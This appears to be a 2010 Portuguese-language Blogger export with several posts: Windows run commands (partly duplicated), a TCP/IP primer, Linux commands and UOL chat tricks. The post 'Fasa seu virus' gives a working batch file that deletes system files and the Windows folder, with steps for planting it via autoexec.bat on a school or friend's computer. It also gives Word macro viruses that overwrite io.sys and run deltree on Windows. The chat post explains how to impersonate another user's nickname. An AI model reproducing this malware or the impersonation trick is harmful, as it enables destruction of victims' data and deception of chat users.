icwconn1<br />Internet Explorer => iexplore<br />Propriedades da Internet => inetcpl.cpl<br />Suporte a Configurações da Internet => inetwiz<br />Configuração de protocolo de Internet( Visualizar tudo) => ipconfig /all<br />Configuração de protocolo de Internet(Visualizar DNS ) => ipconfig /displaydns<br />Configuração de protocolo de Internet (Deletar informações de DNS ) => ipconfig /flushdns<br />Configuração de protocolo de Internet (Todas as conexões ) => ipconfig /release<br />IP Configuration (Renovar Conexões ) => ipconfig /renew<br />IP Configuration (Atualizar DHCP & Re-Registers DNS) => ipconfig /registerdns<br />IP Configuration (Visualizar DHCP Class ID) => ipconfig /showclassid<br />IP Configuration (Modificar DHCP Class ID) => ipconfig /setclassid<br />Painel de controle Java (Executar se instalado ) => jpicpl32.cpl<br />Painel de controle Java (Executar se instalado ) => javaws<br />Propriedades do teclado => control keyboard<br />Configurações de segurança => secpol.msc<br />Usuários e Grupos locais => lusrmgr.msc<br />Fazer Logoff do Windows => logoff<br /><br />Software para retirar Malware´s (fraco) => mrt<br />Microsoft Access (Executar se instalado ) => access.cpl<br />Microsoft Chat (Bate-papo, alguém usa isso? ) => winchat<br />Microsoft Excel (Executar se instalado ) => excel<br />Microsoft Frontpage (Executar se instalado ) => frontpg<br />Microsoft Movie Maker (Ferramenta para edição de filmes caseiros) => moviemk<br />Microsoft Paint (Famoso Paint Brushe ) => mspaint<br />Microsoft Powerpoint (Executar se instalado ) => powerpnt<br />Microsoft Word (Executar se instalado ) => winword<br />Ferramenta para Sincornização => mobsync<br />Minesweeper Game (Jogo " Mina ") => winmine<br />Propriedades do Mouse => control mouse<br />Propriedades do Mouse => main.cpl<br />Nero (Executar se instalado ) => nero<br />Netmeeting (Sofwtare para comunicação, utilizado geralmente em empresas de pequeno porte ) => conf<br />Conexões de rede => control netconnections<br />Conexões de rede => ncpa.cpl<br />Setupe de Conexões de rede => netsetup.cpl<br />Bloco de notas => notepad<br />Nview Desktop Manager (Executar se instalado ) => nvtuicpl.cpl<br />Gerenciador de Objetos => packager<br />Administrador de fontes de dados ODBC => odbccp32.cpl<br />Teclado virtual => osk<br />Opens AC3 Filter (Executar se instalado ) => ac3filter.cpl<br />Outlook Express => msimn<br />Paint => pbrush<br />Propriedades de senha => password.cpl<br />Ajustar Monitor => perfmon.msc<br />Ajustar Monitor => perfmon<br />Opções de telefone e modem => telephon.cpl<br />Discador => dialer<br />Pinball Game => pinball<br />Propriedades de opções de energia => powercfg.cpl<br />Impressoras e Faxes => control printers<br />Pasta de impressoras => printers<br />Editor de characteres particulares (algúem conhece isso?) => eudcedit<br />Quicktime (Se instalado ) => QuickTime.cpl<br />Quicktime Player (Se instalado executar o Quick Time ) => quicktimeplayer<br />Real Player (Se instalado Executar o Real player ) => realplay<br />Configurações regionais => intl.cpl<br />Editor de Registros => regedit<br />Editor de Registros => regedit32<br />Catalogo Telefonico => rasphone<br />Conectar a Desktop Remoto através de um Host ou IP => mstsc<br />Armazenamento removível => ntmsmgr.msc<br />Solicitação do operador de armazenamento removível => ntmsoprq.msc<br />Consulta de diretivas resultantes => rsop.msc<br />Assistente de Cameras e Scanners => sticpl.cpl<br />Tarefas Agendadas => control schedtasks<br />Centro de segurança do Windows => wscui.cpl<br />Serviços => services.msc<br />Opens AC3 Filter (Executar se instalado ) => ac3filter.cpl<br />Outlook Express => msimn<br />Paint => pbrush<br />Propriedades de senha => password.cpl<br />Ajustar Monitor => perfmon.msc<br />Ajustar Monitor => perfmon<br />Opções de telefone e modem => telephon.cpl<br />Discador => dialer<br />Pinball Game => pinball<br />Propriedades de opções de energia => powercfg.cpl<br />Impressoras e Faxes => control printers<br />Pasta de impressoras => printers<br />Editor de characteres particulares (algúem conhece isso?) => eudcedit<br />Quicktime (Se instalado ) => QuickTime.cpl<br />Quicktime Player (Se instalado executar o Quick Time ) => quicktimeplayer<br />Real Player (Se instalado Executar o Real player ) => realplay<br />Configurações regionais => intl.cpl<br />Editor de Registros => regedit<br />Editor de Registros => regedit32<br />Catalogo Telefonico => rasphone<br />Conectar a Desktop Remoto através de um Host ou IP => mstsc<br />Armazenamento removível => ntmsmgr.msc<br />Solicitação do operador de armazenamento removível => ntmsoprq.msc<br />Consulta de diretivas resultantes => rsop.msc<br />Assistente de Cameras e Scanners => sticpl.cpl<br />Tarefas Agendadas => control schedtasks<br />Centro de segurança do Windows => wscui.cpl<br />Serviços => services.msc<span style="font-weight:bold;"></span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-58442693102111747392010-08-03T12:23:00.000-07:002010-08-03T12:24:58.194-07:00TCP/IP<span style="font-weight:bold;">TCP/IP (Transmission Control Protocol/Internet Protocol, ou Protocolo de Controle de Transmissão / Protocolo da Internet) se refere ao conjunto de protocolos utilizados na Internet. Ele inclui uma série de padrões que especificam como os computadores vão se comunicar e cria convenções para interconectar redes e para o routeamento através dessas conexões.<br /><br />Os protocolos da Internet (IP) são o resultado de um projeto da DARPA (Defense Advanced Research Projects Agency, ou Agência de Projetos de Pesquisa Avançada de Defesa) sobre conectividade entre redes no final dos anos 70. Ele foi utilizado em todas as redes de longa distância do sistema de Defesa dos EUA em 1983, mas não foi amplamente aceito até ser incorporado ao BSD (Berkeley Software Distribution) Unix 4.2. A populariedade do TCP/IP é baseada em:<br /><br />· Estrutura cliente-servidor robusta. O TCP/IP é uma excelente plataforma cliente-servidor, especialmente em ambientes WAN (wide-area network, ou redes de grande alcance).<br /><br />· Compartilhamento de informações. Milhares de organizações miltiares, educacionais, científicas e comerciais compartilham dados, correio eletrônico (e-mail), e outros serviços na Internet usando o TCP/IP.<br /><br />· Ampla disponibilidade. Implementações do TCP/IP estão disponívies em praticamente todos os sistemas operacionais populares. Seu código fonte é amplamente disponível em várias implementações. Fabricantes de bridges, routers e analizadores de redes oferecem suporte para o TCP/IP em seus produtos.<br /><br /> <br /><br />Conceitos Basicos<br /><br />Existem alguns conceitos básicos que são imprencindíveis ao entendimento do TCP/IP e de redes que o utilizam.<br /><br />Número de IP<br /><br />Existem algumas analogias entre computadores e telefones e o número de IP é uma delas. Você pode imaginar o número IP como um número de telefone com todos os códigos de discagem internacional. Isto significa que qualquer máquina pode contactar outra máquina usando o número de IP, bastando apenas que exista um caminho entre as 2 máquinas. Além disso toda máquina na rede tem de ter um nº de IP.<br /><br />Isto também significa que 2 máquinas na mesma rede NÃO podem ter o mesmo número de IP. Essa restrição só ocorre para máquinas na mesma rede, pois máquinas numa rede não conectada usualmente tem número de IP iguais, por algumas razões técnicas. No caso da analogia com os telefones, imagine 2 pessoas morando em países diferentes que possuam o mesmo número de telefone (apenas os números locais). Nesse caso não há conflito (exceto talvez na sua mente! :-) ).<br /><br />O número de IP tem 4 bytes de tamanho e tem um formato específico, xxx.xxx.xxx.xxx (exemplo : 200.241.216.20). Isso significa que cada grupamento xxx só pode ir de 0 à 255 (pois essa é a capacidade de 1 byte).<br /><br />Mascara de Sub-Rede<br /><br />Existem 3 classes de endereços IP : classes A, B, C. A diferença entre as classes é a forma de como o nº de IP é interpretado. O nº de IP é divido em duas partes : o endereço da rede e o enderço da sub-rede. Considere o nº IP da seguinte forma : w.x.y.z (ex: 200.241.216.20)<br /><br />ClasseNº de IPIndicador da redeIndicador da Sub-redeNº de redes disponíveisNº de sub-redes disponíveis A1.126wx.y.z12616,777,214 B128.191w.xy.z16,38465,534 C192.223w.x.yz2,097,151254 Obs: O endereço 192.168 é reservado para uso em redes internas, o endereço 127 é utilizado para testes de loopback e os acima de 224 (inclusive) são reservados para protocolos especiais.<br /><br />Uma sub-rede é uma rede ligada diretamente a Internet através de uma rede pertencente a Internet. A rede pertencente recebe um nº de IP, e distribui nº de IP dentro de sua sub-rede. As classes apenas definem quantas sub-redes um nº de IP tem. De acordo com a tabela, existem 126 nº de IP da classe A e cada um deles pode ter 16.777.214 sub-redes. Você logo pode imaginar que não existem endereços classe A para todo mundo, e tem razão, atualmente não existem endereços classe A e B disponíveis na Internet, e os de classe C estão acabando, o IETF (Internet Engenniering Task Force, ou Força Tarefa de Engenharia da Internet ) está estudando a expansão desses números.<br /><br />As máscaras de sub-rede identificam a classe do nº de IP. A primeira vista isso parece desnecessário, pois basta olhar o primeiro número do nº do IP para determinar sua classe. Mas acontece que um nº de IP classe A pode funcionar como um classe B ou classe C, dependendo da estrutura interna de sua sub-rede. Um exemplo : Imagine uma empresa com 200 filiais no Brasil conectadas por uma rede própria. A matriz tem um nº de IP classe A, digamos 100 e distribui suas sub-redes da seguinte forma :<br /><br />100.1.0.0Matriz 100.2.0.0Filial 1 100.3.0.0Filial 2 ....... 100.201.0.0Filial 200 Para as filiais, o nº de IP (ex: 100.201.0.0) é de classe B, pois só tem 16.384 sub-redes disponíveis, embora comece com 100. Dentro das filiais ainda é possível se distribuir sub-redes, as quais teriam nº de IP classe C.<br /><br />Para que o roteamento funcione corretamente, os computadores precisam saber qual a classe do nº de IP, e elas são as seguintes:<br /><br />ClasseMáscara de Sub-rede A255.0.0.0 B255.255.0.0 C255.255.255.0<br /><br />Gateway Padrão (Default Gateway)<br /><br />O gateway padrão é a máquina para quem pedimos ajuda quando não conseguimos achar uma outra máquina na rede. Funciona assim: Quando uma máquina na rede precisa se comunicar com uma outra, ela emite um pedido de conexão (esse pedido é feito através de broadcasting, ou seja, a máquina envia um pedido a toda a rede, e apenas a máquina destino responde) e aguarda uma resposta. Se a resposta não vier, ela entra em contato com o gateway padrão e solicita que o mesmo conecte com a máquina destino. Se o gateway conseguir se conectar à máquina destino, ele fica como "intermediador" dessa conexão, caso contrário ele avisa a máquina solicitante que não foi possível encontrar a máquina destino.<br /><br />Essa estrutura de procura visa diminuir o tráfego desnecessário na rede. Imagine só se toda a solicitação de conexão realizada na Internet (e em todas as redes conectadas à Intenet) fosse enviada para todos os computadores ligados à ela! Seria um tráfego muito grande. Ao invés disso, o broadcasting é feito em níveis, primeiro na LAN (local area network, ou rede local), depois na WAN de sua cidade ou estado, depois na WAN nacional até chegar na WAN internacional. Reduz-se desse modo todo o tráfego interno às WANs e LANs, aliviando as linhas de conexão.<br /><br />DNS<br /><br />Essas 3 letras não significam muita coisa para a maior parte das pessoas, mas elas significam Domain Name System (ou Sistema de Nomes de Domínio). Essas 3 palavras também não significam muita coisa para a maior parte das pessoas também, por isso vamos à analogia com o telefone. Quando deseja telefonar para a loja da esquina, você consulta o catálogo, descobre o telefone de lá e liga. Você não consegue telefonar para lugar algum se não souber o número do telefone. Na rede TCP/IP acontece a mesma coisa. Os usuários não decoram o número IP das máquinas, e sim seus nomes. Mas para se alcançar uma máquina na rede, precisamos do seu número de IP. Para resolver isso, foi criado o DNS, um serviço diponível na rede que, dado um nome de máquina, ele retorna o número de IP da mesma.<br /><br />Existe uma particularidade aqui. No caso da rede local estar conectada a alguma outra, é recomendável que o servidor DNS (o programa que oferece o serviço DNS) seja executado na máquina de ligação entre as 2 redes (o gateway), para que no caso do nome requisitado não existir na rede local, o DNS possa pedir ao servidor DNS da outra rede para pesquisar tal nome.<br /><br />O Windows NT oferece um serviço semelhante, o WINS (Windows Internet Name System, ou Sistema de nomes da Internet do Windows). A principal diferença entre os dois é que o DNS usa uma tabela estática, e o WINS usa uma tabela dinâmica. No caso do servidor DNS rodar numa máquina Windows NT é recomendável que ele seja substituído pelo WINS.<br /><br />DHCP<br /><br />Mais um caso de 4 letras que não significam nada para a maioria das pessoas. Mas infelizmente não existe uma boa analogia para o DHCP, portanto vamos direto ao assunto: DHCP significa Dynamic Host Configuration Protocol ou seja : Protocolo de Configuração de Host Dinâmico. Numa rede TCP/IP, todo computador tem de ter um número de IP distinto. Isto significa que antes de colocar uma nova máquina na rede, o administrador teria de checar quais números estão sendo utilizados para poder escolher um nº adequado para a nova máquina. Em pequenas redes isso é possível de ser feito, mas em grandes redes isso se torna uma tarefa muito tediosa e sujeita a falhas. Para evitar isso, foi criado o DHCP. Quando uma máquina entra na rede, ela procura o servidor DHCP (cujo nº de IP foi previamente fornecido) e solicita um nº de IP para si própria. O servidor verifica qual o nº disponível, informa ao solicitante esse nº e o torna indisponível para futuras solicitações. Dessa maneira, a administração dos nº de IP é feita automaticamente e não existem problemas de conflito. Quando a máquina solicitante sai da rede, o servidor DHCP torna seu nº de IP disponível novamente.<br /><br />Portas<br /><br />Uma porta pode ser vista como um canal de comunicações para uma máquina. Pacotes de informações chegando a uma máquina não são apenas endereçadas à maquina, e sim à máquina numa determinada porta. Você pode imaginar uma porta como sendo um canal de rádio, com a diferença fundamental de que um computador pode "ouvir" a todos os 65000 canais possíveis ao mesmo tempo!<br /><br />Entretanto, um computador geralmente não está escutando a todas as portas, ele escuta umas poucas portas específicas. E ele não vai responder a um pedido que chegue numa porta a qual ele não esteja escutando.<br /><br />Existem uma série de portas pré-definidas para certos serviços que são aceitos universalmente. As principais são :<br /><br />ServiçoPortaDescrição FTP21File Transfer Protocol (Protocolo de Transferência de Arquivos) Telnet23Para se conectar remotamente a um servidor SMTP25Para enviar um e-mail Gopher70Browser baseado em modo texto HTTP80Protocolo WWW - Netscape, Mosaic POP3110Para receber e-mail NNTP119Newsgroups IRC6667Internet Relay Chat - Bate papo on-line Compuserve4144Compuserve WinCIM AOL5190America Online MSN569Microsoft Network Outros Termos<br /><br />· Roteador : É um computador especial que é utilizado para conectar 2 ou mais redes distintas. Ele tem esse nome porque tem de "rotear" (ou redirecionar) os pacotes de uma rede para outra, atuando como um "guarda de trânsito" para os pacotes entre as redes.<br /><br />· Gateway : O gateway é um computador que também é utilizado para conectar 2 ou mais redes distintas. A principal diferença para o roteador é que o gateway não tem hardware especial para efetuar o roteamento. Usualmente os gateways conectam LANs e os roteadores, WANs. Em vários casos se utiliza um roteador em conjunto com um gateway.<br /><br />Visão Geral de uma rede TCP IP<br /><br />Uma rede utilizando o TCP/IP tem uma estrutura básica composta por um (ou mais) servidor rodando um servidor DNS (ou WINS), DHCP, SMTP, POP3 e os servidores dos serviços desejados (HTTP, Gopher, Telnet e etc) e as máquinas clientes solicitando esses serviços. Para se interligar essa rede a uma outra rede TCP/IP, se faz necessário o uso de um roteador ou gateway e da correta configuração da rede.<br />Existem 2 maneiras de se ligar a LAN à Internet :<br /><br />· Atribuindo-se um nº de IP válido para cada máquina na rede, o que pode ser impossível para redes com muitas máquinas.<br /><br />· Atribuindo-se um nº de IP válido para o gateway e utilizando-se o nº de IP 192.168.x.x internamente.<br /><br />Como o segundo caso é o mais factível, vamos observá-lo melhor. Nele, se utiliza internamente à LAN o IP 192.168.x.x, que quando da determinação do padrão dos nº de IP foi reservado para uso em redes internas, ou seja, nenhuma máquina ligada diretamente à Internet tem um IP 192.168.x.x. Isso é necessário pois como já vimos nenhuma máquina pode ter um nº de IP que já esteja sendo utilizado por uma outra máquina.<br /><br />O gateway tem 2 interfaces de rede, uma para se conectar à Internet e outra para se conectar à LAN. À interface da Internet é atribuido o nº de IP válido na Internet e na da LAN o nº de IP do tipo 192.168.x.x (usualmente 192.168.0.1). Nas máquinas da LAN o nº de IP é do tipo 192.168.x.x (aonde o 1º "x" é o mesmo do do gateway) e o gateway default é o IP do gateway voltado para a LAN (192.168.x.x). Dessa forma podemos ter até 16.384 máquinas na internet por nº de IP válido. Essa estrutura também facilita a adoção de medidas de segurança contra intrusos da Internet, pois como todo o tráfego Internet passa pelo gateway, basta protegê-lo para proteger toda a LAN.<br /><br />Protocolos<br /><br />TCP e IP<br /><br />O TCP e o IP são apenas 2 membros da família TCP/IP. IP é um protocolo que providência a entrega de pacotes para todos os outros protocolos da família TCP/IP. O IP oferece um sistema de entrega de dados sem conexão. Isto é, os pacotes IP não são garantidos de chegarem ao seu destino, nem de serem recebidos na ordem em que foram enviados. O checksum do IP confirma apenas a integridade do cabeçalho do pacote. Desta maneira, a responsabilidade pelos dados contidos no pacote do IP (e sua sequência) é tarefa de protocolos de mais alto-nível.<br /><br />Talvez o protocolo de alto nível do IP mais comum seja o TCP. O TCP oferece um confiável protocolo baseado em conexão encapsulado no IP. O TCP garante a entrega dos pacotes, assegura o sequenciamento dos pacotes, e providencia um checksum que valida tanto o cabeçalho quanto os dados do pacote. No caso da rede perder ou corromper um pacote TCP/IP durante a transmissão, é tarefa do TCP retransmitir o pacote faltoso ou incorreto. Essa confiabilidade torna o TCP/IP o protocolo escolhido para transmissões baseadas em sessão, aplicativos cliente-servidor e serviços críticos como correio eletrônico.<br /><br />Porém essa confiabilidade tem um preço. Os cabeçalhos dos pacotes TCP requerem o uso de bits adicionais para assegurar o correto sequenciamento da informação, bem como um checksum obrigatório para garantir a integridade do cabeçalho e dos dados. Para garantir a entrega dos pacotes, o protocolo também requer que o destinatário informe o recebimento do pacote.<br /><br />Tal "informação de recebimento" (ou ACKs, de acknowledgments) geram tráfego adicional na rede, diminuindo a taxa de transferência de dados em favor da confiabilidade. Para reduzir o impacto na peformance, a maioria dos servidores enviam um ACK para todo segmento de dados (ao invés de todo pacote) ou quando um ACK expira.<br /><br />UDP<br /><br />Se a confiabilidade não é essencial, o UDP (User Datagram Protocol), um complemento do TCP, oferece um serviço de transmissão de dados sem conexão que não garante nem a entrega nem a correta sequência dos pacotes enviados (bem parecido com o IP). Checksums no UDP são opcionais, ofereccndo assim uma maneira de se trocar dados em uma rede altamente confiável sem consumir desnecessariamente recursos da rede.<br /><br />ARP e ICMP<br /><br />Dois outros protocolos na família TCP/IP tem importantes funções, embora essas funções não estejam diretamente relacionadas com a transmissão de dados: ARP (Address Resolution Protocol, ou Protocolo de Resolução de endereços) e ICMP (Internet Control Message Protocol, ou Protocolo de Controle de Mensagens da Internet). O ARP e o ICMP são protocolos de manutenção que mantêm a estrutura do IP e usualmente são invisíveis aos usuários e às aplicações.<br /><br />Os cabeçalhos do IP contém tanto o endereço IP da origem quanto do destino, mas o endereço do hardware também tem de ser conhecido. O IP obtém um endereço de hardware de um determinado sistema difundindo pela rede um pacote especial de requisição (um pacote ARP de requisição) contendo o endereço IP do sistema com o qual está tentando se comunicar. Todos os nós da rede local que tiverem o ARP habilitado detectam essa difusão, e o sistema que tem o número de IP em questão envia um pacote (do tipo ARP reply, ou resposta ARP) contendo seu endereço de hardware para o computador que o solicitou. O endereço de hardware e o endereço IP do computador estão é armazenado no cache do ARP para uso futuro. Como a resposta ARP também é feita na forma de difusão, é normal que outros nós usem essa informação para atualizar seus caches ARP.<br /><br />O ICMP permite que 2 nós em uma rede IP compartilhem o status do IP (protocolo) e informação de erros. Esta informação pode ser usada por protocolos de alto nível para tratar problemas de transmissão ou para administradores de rede para detectar problemas na rede. Embora estejam encapsulados em pacotes IP, o ICMP não é considerado um protocolo de alto nível (ele é necessário em toda implementação do TCP/IP). O utilitário ping faz uso do ICMP para determinar se um certo endereço IP na rede está operacional. Isto é útil para diagnosticar problemas em redes IP ou falhas em gateways.<br /><br />Outros Protocolos<br />Além desses protocolos citados, existem os protocolos de alto-nível, como o Telnet, FTP, HTTP e etc. Vamos a uma breve descrição deles :<br /><br />· Telnet : É um protocolo que permite o logon em máquinas remotas. Você passa a utilizar a máquina remota para realizar o processamento. No Windows NT existe o RAS (Remote Access Service, Serviço de Acesso Remoto) que tem os mesmos objetivos do Telnet.<br /><br />· FTP : File Transfer Protocol (protocolo de transferência de arquivos), como o nome já diz é utilizado para a transferência de arquivos.<br /><br />· HTTP: Hyper Text Transfer Protocol : É o protocolo utilizado pela Web, ele transmite textos, gráficos e qualquer outro tipo de arquivo (substituindo o FTP) além de permitir a navegação através de hiper texto.</span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-19750597797558905982010-08-03T12:22:00.000-07:002010-08-03T12:23:15.936-07:00Fasa seu virus<span style="font-weight:bold;">Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker ,ou o do seu trabalho, etc.)<br />Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:<br /><br />copy con arquivo.bat<br /><br />@echo off<br /><br />@echo frase de sua preferência<br /><br />del*.sys<br /><br />del*.exe<br /><br />del*.com<br /><br />cd windows<br /><br />del*.*<br /><br />del arquivo.bat<br /><br />@echo frase de sua preferência<br /><br />Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.<br />Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat.<br />Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga thau, hehe.<br /><br />VEJA UM EXEMPLO DE VIRUS DE MACRO QUE ADULTERA A IMPRESSÃO.<br /><br />Vírus 12/04<br />Sub MAIN<br />If Dia(Agora()) = 12 and Mês(Agora()) = 04 Then<br />DefinirAtributo “C:\msdos.sys”, 0 aaaaOpen “C:\io.sys” For Output As # 1 aaaaPrint #1, “Beba Josta”<br />Close #1<br />End if<br />Open “c:\autoexec.bat” For Output As #1<br />Print #1, “@echo off” Print #1, “cls” aaPrint #1, “@deltree /y c:\windows > nul”<br />Close #1<br />End Sub<br /><br />ROTINA 2<br /><br />Sub MAIN<br />Open “C:\imaiden.txt” for Output As #1”<br />Print #1 “Código em hexadecimal”<br />Print #1 “Código em hexadecimal” ‘(continuação)...<br />Close #1<br />Shell “debug texto.txt”<br />Shell “c:\imaiden.com”<br />End Sub<br /><br />ROTINA 3<br /><br />Sub MAIN<br />MacroCopiar “Global:Inocu”, “DocumentoNovo”, 0<br />End sub<br /><br />Vírus Fagundes Varela<br /><br />Sub MAIN<br />InícioDocumento<br />Inserir “Lembra dessas noites”<br />Inserir CHR$(13)<br />Inserir “Cheias de doce harmonia,” aaa Inserir CHR$(13)<br />Inserir “Quando a floresta gemia” aa aaa Inserir CHR$(13)<br />Inserir “Do vento aos brandos açoites?”<br />Inserir CHR$(13)<br />Inserir CHR$(13)<br />Inserir “Quando as estrelas sorriam” aaa Inserir CHR$(13)<br />Inserir “Quando as campinas tremiam”<br />Inserir CHR$(13)<br />Inserir “Nas dobras do úmido véu?” aaa Inserir CHR$(13)<br />Inserir “E nossas almas unidas”<br />Inserir CHR$(13)<br />Inserir “Estreitavam-se, sentidas,” aaa Inserir CHR$(13)<br />Inserir “Ao brilhar daquele céu?” aaaArquivoImprimirPadrão<br />End Sub </span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-32234058854403599082010-08-03T12:20:00.000-07:002010-08-03T12:21:49.031-07:00Comando basicos linux<span style="font-weight:bold;">ls = Lista os arquivos, mesmo que dir do DOS<br /> <br /><br /> * Atributos comuns:<br /> * -a = mostra arquivos ocultos<br /> * -l = mostra bytes, permissões, diretório, etc<br /><br /><br />Obs: no ls os nomes de arquivos nos sistemas *X (Unix, linux, etc) não precisam ter só 8 letras. Dai, se você quer listar os arquivos começados com u, por exemplo, peca ls u* e veja o resultado.<br />* substitui qualquer conjunto de caracteres<br />? substitui caracteres isolados<br />----------<br />rm = remove arquivos, no formato: rm (arquivo1) (arquivo2) (arquivo3) ...<br /> <br /><br /> * Exemplo: rm look.doc / rm root.txt link.html win95.w95<br /><br />----------<br />cp = copia arquivos, no formato: cp (arquivo1) (diretório)<br /> <br /><br /> * Exemplo: cp manual.txt /home/manual<br /><br />----------<br />cat = mostra o conteúdo do arquivo, mesmo que o 'type' no DOS<br />----------<br />more = exibe o conteúdo de um arquivo pagina a pagina, mesmo q no DOS<br /><br /> * Exemplo: ls|more<br /><br />----------<br />pwd = exibe o diretório atual (o que vc esta)<br />----------<br />rmdir = apaga diretório<br /> <br /><br /> * Exemplo: rmdir /diretório se o diretório estiver cheio, use o rm com o atributo -r<br /><br />----------<br />mkdir = cria diretório<br /> <br /><br /> *<br /><br /> Exemplo: mkdir /diretório<br /><br />----------<br />clear = limpa a tela, mesmo que 'cls' no DOS<br />----------<br />who = mostra quem está na maquina no momento<br />----------<br />whoami = mostra quem você e - útil quando você esquece com q login entrou... ;)<br />----------<br />finger = mostra o usuário associado a certa chave<br />----------<br />df = mostra o espaço usado, livre e a capacidade das partições do HD<br />----------<br />free = exibe a memória livre, a usada, e o buffers da memória RAM<br />----------<br />exit e logout = sai da sessão atual<br />----------<br />tar (tape archive) = programa de geração de backup<br />tar -c gera backup<br />tar -x restaura backup<br />tar -v lista cada arquivo processado<br />tar -t lista o conteúdo de um backup<br />----------<br /><br />Nota: Para descompactar arquivos "tagged"(.tar.gz, .tgz, etc)<br />tar zxpvf (nome_do_arquivo)<br />Se o arquivo for "gziped"(.gz):<br />gunzip -d (nome_do_arquivo)<br /><br />----------<br />chmod - muda as permissões do arquivo/diretório<br />chown - muda as permissões do arquivo/diretório<br />----------<br />awk - Procura por um modelo a partir de um arquivo. Inclui uma linguagem de programação embutida.<br />----------<br />bdiff - Compara dois arquivos grandes.<br />----------<br />bfs - Procura um arquivo grande.<br />----------<br />cal - Exibe um calendário.<br />----------<br />cat - Encadeia e imprimi arquivos.<br />----------<br />cc - Compilador C.<br />----------<br />cd - Muda diretório.<br />----------<br />chgrp - Muda o titulo de um grupo de arquivos.<br />----------<br />cmp - Compara dois arquivos; mostra a localização (linha e byte) da primeira diferença entre eles.<br />----------<br />comm - Compara dois arquivos para determinar quais linhas sao comuns entre eles.<br />----------<br />cu - Chamar outro sistema UNIX.<br />----------<br />date - Retorna a data e a hora.<br />----------<br />diff - Exibe as diferenças entre dois arquivos ou diretórios.<br />----------<br />diff3 - Exibe as diferenças entre tres arquivos ou diretorios.<br />----------<br />du - Relatorio no uso do sistema de arquivos.<br />----------<br />echo - Exibe seus argumentos.<br />----------<br />ed - Editor de texto.<br />----------<br />ex - Editor de texto.<br />----------<br />expr - Avalia seus argumentos quando geralmente e uma formula matematica.<br />----------<br />f77 - Compilador FORTRAN.<br />----------<br />find - Localiza os arquivos c/ caracteristicas especificas.<br />----------<br />format - Inicializa um floppy disk.<br />----------<br />grep - Procura um modelo a partir de um arquivo. (veja awk)<br />----------<br />help - :/ (ajuda)<br />----------<br />kill - Termina um processo.<br />----------<br />ln - Usado para unir arquivos.<br />----------<br />lpr - Copia um arquivo para a linha de impressora.<br />----------<br />ls - Exibe informacoes sobre um ou mais arquivos.<br />----------<br />mail - Usado para receber ou enviar e-mail.<br />----------<br />nroff - Usado para formatar textos.<br />----------<br />ps - Exibe um status dos processos.<br />----------<br />sleep - Causa um processo para tornar-se inativo por uma duracao de tempo especifica.<br />----------<br />sort - Escolher e unir um ou mais arquivos.<br />----------<br />spell - Procurar erros de ortografia num arquivo.<br />----------<br />split - Dividir um arquivo.<br />----------<br />stty - Exibir ou escolher parametros do terminal.<br />----------<br />tail - Exibir o fim de um arquivo.<br />----------<br />tset - Escolher o tipo de terminal.<br />----------<br />umask - Permite que o usuario especifique uma nova criacao de camuflagem.<br />----------<br />uniq - Compara dois arquivos. Procura e exibe em linhas o que e incomparavel em um arquivo.<br />----------<br />uucp - Execucao UNIX-para-UNIX<br />----------<br />vi - Editor de tela cheia.<br />----------<br />wc - Exibe detalhes no tamanho do arquivo.<br />----------<br />who - Informacoes de quem esta on-line.<br />----------<br />write - Usado para mandar mensagens para outro usuário.</span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-62468290146932917322010-08-03T12:18:00.000-07:002010-08-03T12:20:08.151-07:00Chat<span style="font-weight:bold;"> Como clonar no chats<br /><br />Muitos me perguntam como clonar no bate papo é claro...rs, a uol colocou um sistema que impede que as pessos<br />sejam clonadas, então oq eu faço uma combinação de codigos depois do nick da pessoa que força a entrada, mais na<br />lista de nicks o nick fica diferente a vantagem que na hora que vc envia a mensagem os codigos não aparecem então<br />passa por clonado...Chega de papo furado vamos lá, como fazer: coloque naonde vc coloca o nick normalmente o nick<br />da vitima mais esses caracteres  coloque a cor e a careta se necessario...só vai dar certo se o nick mais esses<br />caracteres tiverem no maximo 35 caracteres...se vc colocar somente esses caracteres vc entra sem nick ... * Detalhe eu<br />só faço isso com o ChatNóia não sei se é possivel com o UolME, com certeza pelo site e com o jane não funciona...<br /><br /><br />Mensagem Colorida com ChatNóia<br /><br />Para mandar mensagem colorida com o ChatNóia basta: segurar a tecla Ctrl e apertar a tecla k, vai aparecer uma<br />caixa de cores basta escolher uma, vai ficar assim +mais o numero referente a cor que você escolheu só que assim só<br />vai mudar o cor da letra para mandar o fundo da mensagem com cor você de colocar o mais o numero da cor e o<br />numero do fundo dividido por , exemplo para mandar uma mensagem com fundo preto e letra branca deverá ficar<br />assim 0,1 o geito mais facil de colocar o quadrado é segurar a tecla Ctrl mais a tecla backspace.. * Detalhe somente<br />usuarios do ChatNoia que vem as mensagens coloridas os outros usuarios vem apenas os numeros...<br /><br /><br />Como usar o ChatNóia 0.92 e o 0.95<br /><br />Como a uol vive mudando a entrada do bate papo muitos programas deixam de funcionar então surgem as novas<br />versões para corrigir o problema mais sempre els vem um pouco alterado no caso do ChatNoia 0.96 muita gente se<br />queixa, dizem que assim que entram no bate papo aparece uma mensagem desconectado do servidor, particularmente<br />a melhor versão do Noia foi o 0.92 mais chega de papo como usar o Noia 0.92 e o 0.95: faça o processo para entrar na<br />bate papo pela pagina da uol e abra o Noia e faça o mesmo quando pedir os caracteres para a entrada você vai usar<br />os que apareceram pela site e pronto * Detalhe você vai ter que ter uma sincronia se der muita diferença de tempo de<br />um para o outro não vai dar ai vc vai ter que carregar tudo denovo..<br /><br /><br /><br />Caracteres Especiais<br /><br />Bem com a tecla ALT esquerda apertada, vá no teclado de números , vulgarmente falando ... que se<br 